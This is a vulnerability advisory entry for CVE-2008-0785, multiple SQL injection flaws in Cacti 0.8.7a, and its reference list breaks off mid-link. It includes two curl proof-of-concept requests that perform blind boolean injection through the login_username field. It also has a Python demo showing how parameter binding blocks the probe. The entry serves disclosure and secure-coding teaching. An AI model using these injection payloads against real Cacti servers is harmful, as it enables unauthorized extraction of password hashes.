Cacti Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1114542
Vulnerability type: SQL injection
Published: 2008-02-12
Updated: 2008-09-05
CVE ID: CVE-2008-0785
CNNVD-ID: CNNVD-200802-295
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/31161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-295
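|Vulnerability details
Cacti is an open-source network traffic monitoring and analysis tool developed by the Cacti team. It collects data with snmpget, uses RRDtool to draw graphs for analysis, and provides data and user management features. Cacti contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via: (1) the graph_list parameter of graph_view.php; (2) the leaf_id and id parameters of tree.php; (3) the local_graph_id parameter of graph_xport.php; (4) the login_username parameter of index.php.
|Exploit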
source: http://www.securityfocus.com/bid/27749/info
     
Cacti is prone to multiple unspecified input-validation vulnerabilities, including:
     
- Multiple cross-site scripting vulnerabilities
- Multiple SQL-injection vulnerabilities
- An HTTP response-splitting vulnerability.
     
Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
     
These issues affect Cacti 0.8.7a and prior versions. 

$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login" \
| head -n1
HTTP/1.1 302 Found
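
The two requests above get different status lines because the comparison inside login_username is evaluated by the database. The following is an added example, not code from Cacti or from the advisory: it reproduces that effect against an in-memory SQLite table and shows that bound parameters remove it. The user_auth schema, the stored hash and the function names are assumptions, and MySQL's '#' comment is written as '--' for SQLite.

```python
import sqlite3

# Constructed sample hash; its first character '9' is ASCII 57.
STORED_HASH = "9f" * 16

# The page's two login_username values after form decoding, with MySQL's '#'
# comment swapped for '--' because this demo runs on SQLite.
PROBE_GT = "foo' or ascii(substring(password,1,1))>56 -- "
PROBE_LT = "foo' or ascii(substring(password,1,1))<56 -- "


def make_db():
    """In-memory stand-in for the account table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    # Register the MySQL functions used in the probe so SQLite accepts them.
    db.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    db.create_function("substring", 3, lambda s, i, n: s[i - 1:i - 1 + n])
    db.execute("CREATE TABLE user_auth (username TEXT, password TEXT)")
    db.execute("INSERT INTO user_auth VALUES ('admin', ?)", (STORED_HASH,))
    return db


def login_concat(db, username, password_hash):
    """Vulnerable pattern: request input is spliced into the SQL text."""
    sql = ("SELECT 1 FROM user_auth WHERE username = '" + username +
           "' AND password = '" + password_hash + "'")
    return db.execute(sql).fetchone() is not None


def login_bound(db, username, password_hash):
    """Hardened pattern: input travels as bound parameters, never as SQL."""
    sql = "SELECT 1 FROM user_auth WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password_hash)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for name, probe in (("first byte > 56", PROBE_GT), ("first byte < 56", PROBE_LT)):
        print(name, "| concat:", login_concat(db, probe, "x"),
              "| bound:", login_bound(db, probe, "x"))
    print("valid login, bound:", login_bound(db, "admin", STORED_HASH))
```

With concatenation the login result follows the truth of the injected comparison; with binding both probes are treated as a literal, non-matching user name.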
|References

Source: BID
Name: 27749
Link: http://www.securityfocus.com/bid/27749
Source: www.cacti.net
Link: http://www.cacti.net/release_notes_0_8_7b.php
Source: XF
Name: cacti-datainput-xss(50575)
Link: http://xforce.iss.net/xforce/xfdb/50575
Source: SECTRACK
Name: 1019414
Link: http://www.securitytracker.com/id?1019414
Source: BID
Name: 34991
Link: http://www.securityfocus.com/bid/34991
Source: BUGTRAQ
Name: 20080212 Cacti 0.8.7a Multiple Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/488018/100/0/threaded
Source: BUGTRAQ
Name: 20080212 cacti -- Multiple security vulnerabilities have been discovered
Link: http://www.securityfocus.com/archive/1/archive/1/488013/100/0/threaded
Source: VUPEN
Name: ADV-2008-0540
Link: http://www.frsirt.com/english/advisories/2008/0540
Source: SECUNIA
Name: 28872
Link: http://secunia.com/advisories/28872
Source: bugs.cacti.net
Link: http://bugs.cacti.net/view.php?id=1245
Source: FEDORA
Name: FEDORA-2008-1737
Link: https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00593.html
Source: FEDORA
Name: FEDORA-2008-1699
Link: https://www.redhat.com/archives/fedor